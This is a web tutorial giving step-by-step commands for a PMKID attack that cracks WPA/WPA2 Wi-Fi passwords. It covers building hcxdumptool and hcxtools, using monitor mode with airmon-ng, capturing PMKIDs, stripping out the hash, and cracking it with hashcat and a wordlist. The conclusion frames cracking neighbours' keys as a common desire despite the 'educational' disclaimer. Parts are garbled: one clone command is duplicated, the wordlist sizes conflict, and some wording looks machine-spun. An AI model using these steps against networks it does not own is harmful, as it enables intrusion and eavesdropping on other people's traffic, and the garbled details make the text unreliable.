
How to Hack Wi-Fi using PMKID Attack:
The article is only for educational purposes and should be used for improving security of your own network. We will not be responsible for any rules that you might break in your area/country.
If you agree, keep reading this article to increase your knowledge.
Table of contents
Requesting PMKID from the Router
In the older techniques, you had to wait until a user is connected to the access point so that you can capture a 4-way handshake. The new method does not require that anymore to find out password credentials. This attack works on the Robust Security Network Information Element (RSN-IE). This technique was developed by security researchers at hashcat, Linux based Password cracking tool.
Step 1 – Download and Install Hcxdumptool
First you need to download hcxtools which is available on GitHub.
Kali > git clone https://github.com/ZerBea/hcxdumptool
Next download hcxdumptools
Kali > git clone https://github.com/ZerBea/hcxdumptool

After downloading you must install these tools.
Navigate to new hcxdumptools directory.
Kali > cd hcxdumptools
Then run the command “make”
Kali > make
And then run the command “make install”
Kali > make install.

Then navigate to hcxtools directory and repeat the same process.
Kali > cd hcxtools
Kali > make
Kali > make install
Step 2 – Place Wireless adapter into Monitor Mode
Next, you must start airmon-ng from the aircrack-ng suite of Wi-Fi Hacking tools to put the wireless adapter into monitor mode.
Kali > airmon-ng start wlan0
After starting, the name of your wireless card will be changed from wlan0 to wlan0mon.

Now start airodump-ng on the wireless adapter in monitor mode.
Kali > airodump-ng wlan0mon

Step – 3 Use hcxdumptool to capture PMKID
The next step is to use hcxdumptool to grab the PMKID that contains the pre-shared key or password.
Kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID –enable_status=1 Run the command and wait. In some cases, it may take several hours to take all the PMKID’s.

Step – 4 Strip Out All the Extraneous Data in PMKID
The PMKID contains the hash of the PSK, but also other information that is not useful for you. You must strip out the data leaving just with hash of PSK, before start cracking the hash.
Navigate to the hcxtool directory.
Kali > cd hcxtools
Now, you use hcxcaptool to strip out all the other information in the file leaving with just PSK hash.
kali > hcxcaptool -z hashoutput.txt HackersArisePMKID
This will leave you with PSK hash in the file named, hashoutput.txt
Step – 5 Crack the Hash
The final step is to crack the hash. To crack the hash, I have to use hashcat using top 100000 passwords as my wordlist.
Kali > hashcat -m 16800 hashoutput.txt top10000password.txt

-m 16800 designates the type of hash.
Hashoutput.txt is the file containing stripped-out PSK hash.
To10000passwords.txt is a text file containing the 10,000 most used passwords.
Conclusion
It’s everybody’s fantasy about discovering the Wi-Fi secret key of their companions, neighbors, etc. However, due to nature of this wireless network technology, there are ways around security and individuals can really break the secret key. New hacking strategies are constantly delivered however are fixed when they are uncovered to people in general.
Continuously be cautious about what you click on the web. Programmers are discovering new strategies and ways consistently to take the secret phrase of your remote switch. The inconvenience of being hacked is that they would then be able to listen in on your organization, block traffic and infuse hurtful malware! Ideally, after perusing this article you will currently have figured out How to Hack Wi-Fi using PMKID Attack Wi-Fi using PMKID Attack Hack Wi-Fi Network Password utilizing PMKID Attack Method for WPA2 and WPA.